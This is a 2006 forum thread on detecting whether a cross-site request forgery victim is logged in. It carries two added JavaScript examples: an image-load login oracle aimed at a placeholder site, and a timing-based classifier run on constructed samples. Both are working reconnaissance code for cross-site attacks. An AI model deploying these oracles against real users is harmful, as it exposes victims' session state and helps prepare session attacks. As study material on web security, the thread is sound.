Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
More effective CSRFs!
Posted by: kishord
Date: December 05, 2006 11:18AM

Identifying if your victim is logged in is easy:

Here is the article

http://wasjournal.blogspot.com/2006/12/use-of-time-delay-technique-for.html

Re: More effective CSRFs!
Posted by: rsnake
Date: December 05, 2006 11:41AM

I've looked into things like that before too. One of the most useful ones is images that are protected behind the login. If you get an onerror, poof, they aren't logged in. That only works on certain websites, but it does work.

- RSnake
Gotta love it. http://ha.ckers.org

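The image-load oracle RSnake describes, written out as an added example (this is not code from the thread or from ha.ckers.org). The attacker page loads an image that the target serves only to authenticated users; `onload` means the victim has a session, `onerror` means the server answered with something that is not an image (a login page, a redirect to HTML, a 403). `PROTECTED_IMAGE_URL` is a hypothetical placeholder, and `makeFakeImage` is a constructed stand-in for `window.Image` so the logic can be exercised without a browser.

```javascript
// Added example, not code from the original thread: a login oracle built on
// the image-load trick. The image constructor is injected so the same logic
// runs in a browser (pass window.Image, or omit the argument) and offline.
// The URL is a hypothetical placeholder, not a real endpoint.
const PROTECTED_IMAGE_URL = "https://target.example/account/avatar.png";

function probeLoggedIn(url, ImageCtor = globalThis.Image, timeoutMs = 5000) {
  return new Promise((resolve) => {
    const img = new ImageCtor();
    let timer = null;
    let settled = false;
    const finish = (state) => {
      if (settled) return;          // only the first event counts
      settled = true;
      clearTimeout(timer);
      resolve(state);
    };
    img.onload = () => finish("logged-in");
    img.onerror = () => finish("logged-out");
    // Neither event within the deadline (blocked host, hung request): report
    // that rather than guess, since an exploit acting on a guess misfires.
    timer = setTimeout(() => finish("unknown"), timeoutMs);
    // Cache-bust: a copy cached from an earlier visit would fire onload and
    // report "logged-in" without ever asking the server.
    const sep = url.includes("?") ? "&" : "?";
    img.src = `${url}${sep}_=${Date.now()}`;
  });
}

// Constructed stand-in for window.Image so the oracle can be exercised without
// a browser. `servedImages` holds the URLs (without query string) that this
// simulated server answers with a real image for the current "user".
function makeFakeImage(servedImages, { silent = false } = {}) {
  return class FakeImage {
    set src(value) {
      if (silent) return;           // simulates a request that never completes
      const ok = servedImages.has(value.split("?")[0]);
      // Browsers deliver load/error asynchronously; do the same here.
      setTimeout(() => (ok ? this.onload() : this.onerror()), 0);
    }
  };
}

// Demonstration with three simulated victims: logged in, logged out, and one
// whose request never completes (short deadline so the demo stays quick).
async function demo() {
  const loggedIn = makeFakeImage(new Set([PROTECTED_IMAGE_URL]));
  const loggedOut = makeFakeImage(new Set());
  const unreachable = makeFakeImage(new Set(), { silent: true });
  return {
    loggedIn: await probeLoggedIn(PROTECTED_IMAGE_URL, loggedIn),
    loggedOut: await probeLoggedIn(PROTECTED_IMAGE_URL, loggedOut),
    unreachable: await probeLoggedIn(PROTECTED_IMAGE_URL, unreachable, 20),
  };
}
```

In a real page, `probeLoggedIn(PROTECTED_IMAGE_URL)` is enough; the browser's own `Image` is used. Two caveats a practitioner should check before relying on it: the target must actually have a resource that is an image only when logged in, and the browser must attach the victim's cookies to a cross-site `<img>` request. Browsers that default cookies to `SameSite=Lax` (Chrome has since 2020) do not send them on such a load unless the site marks its session cookie `SameSite=None; Secure`, in which case this oracle reports "logged-out" for everyone.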
Re: More effective CSRFs!
Posted by: maluc
Date: December 05, 2006 04:34PM

Time delay is a very exciting idea, especially against encryption and embedded systems.. but network time is much too imprecise for my liking :T

I probably wouldn't code any exploit, and certainly not a worm, that relied on that timing test.. maybe in a bind

-maluc

Re: More effective CSRFs!
Posted by: rsnake
Date: December 05, 2006 05:01PM

Maybe you can baseline it and have it check some other known timing values on the web and see how long it takes them to return. Averaging timing delays you can get a pretty concrete example of what their bandwidth and network lag looks like.

- RSnake
Gotta love it. http://ha.ckers.org

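RSnake's baselining suggestion carried through as an added example (not code from the thread, the linked article, or ha.ckers.org). The victim's network lag is estimated from a reference resource whose server-side cost is the same for every user, subtracted from the timing of the login-dependent resource, and the remainder is matched against the server-side cost of each state as measured by the attacker in advance. The cost profile and every timing sample below are constructed values, not measurements; the round-trip samples would be gathered in the browser by timing repeated requests, which this block takes as input. The "inconclusive" verdict is what answers maluc's objection: when jitter swamps the difference between the two states, the function declines to guess.

```javascript
// Added example, not code from the original thread: a timing oracle for login
// state with a per-victim network baseline. All numbers are constructed.

function median(xs) {
  const s = [...xs].sort((a, b) => a - b);
  const m = s.length >> 1;
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

// Median absolute deviation: a spread estimate that a few slow outliers
// (retransmits, GC pauses) do not inflate the way a standard deviation would.
function mad(xs) {
  const med = median(xs);
  return median(xs.map((x) => Math.abs(x - med)));
}

// referenceSamples: round-trip times (ms) to a resource whose server cost is
//                   negligible for any user, e.g. a static image.
// probeSamples:     round-trip times (ms) to the login-dependent resource.
// profile:          server-side cost per state from the attacker's own lab,
//                   e.g. { "logged-in": 400, "logged-out": 20 } (hypothetical).
// Returns the matching state, or "inconclusive" when the noise is too large.
function classifyTiming(referenceSamples, probeSamples, profile,
                        { k = 3, minToleranceMs = 20 } = {}) {
  if (referenceSamples.length < 3 || probeSamples.length < 3) return "inconclusive";
  const lag = median(referenceSamples);
  const jitter = Math.max(mad(referenceSamples), mad(probeSamples));
  const tolerance = Math.max(k * jitter, minToleranceMs);
  const serverTime = median(probeSamples) - lag;   // network lag cancels out

  const states = Object.entries(profile);          // [[state, cost], ...]
  const costs = states.map(([, cost]) => cost);
  const gap = Math.max(...costs) - Math.min(...costs);
  // Two states closer together than two tolerance bands cannot be told apart.
  if (gap <= 2 * tolerance) return "inconclusive";

  const [state, cost] = states.reduce((best, cur) =>
    Math.abs(cur[1] - serverTime) < Math.abs(best[1] - serverTime) ? cur : best);
  return Math.abs(cost - serverTime) <= tolerance ? state : "inconclusive";
}

// Constructed lab profile and samples for victims of one hypothetical site.
const LAB_PROFILE = { "logged-in": 400, "logged-out": 20 };
const SAMPLES = {
  reference: [120, 130, 125, 140, 122, 128, 135],   // ~128 ms lag, ~6 ms jitter
  loggedIn:  [530, 545, 520, 560, 535, 528, 540],   // 128 ms lag + ~400 ms server
  loggedOut: [150, 145, 160, 148, 155, 142, 170],   // 128 ms lag + ~20 ms server
  noisyRef:  [100, 400, 150, 900, 120, 600, 200],   // a congested, jittery link
};

function demo() {
  return {
    loggedIn: classifyTiming(SAMPLES.reference, SAMPLES.loggedIn, LAB_PROFILE),
    loggedOut: classifyTiming(SAMPLES.reference, SAMPLES.loggedOut, LAB_PROFILE),
    noisy: classifyTiming(SAMPLES.noisyRef, SAMPLES.loggedIn, LAB_PROFILE),
    tooFew: classifyTiming([128, 130], [535, 540], LAB_PROFILE),
  };
}
```

The two knobs are `k`, how many jitter bands the probe may sit from a lab value before the verdict is withheld, and `minToleranceMs`, a floor so that a handful of suspiciously identical samples does not produce a false certainty. On the constructed data the clean link classifies both victims correctly, while the congested link yields "inconclusive" because its jitter band (about 300 ms) is wider than the 380 ms separation between the two lab costs.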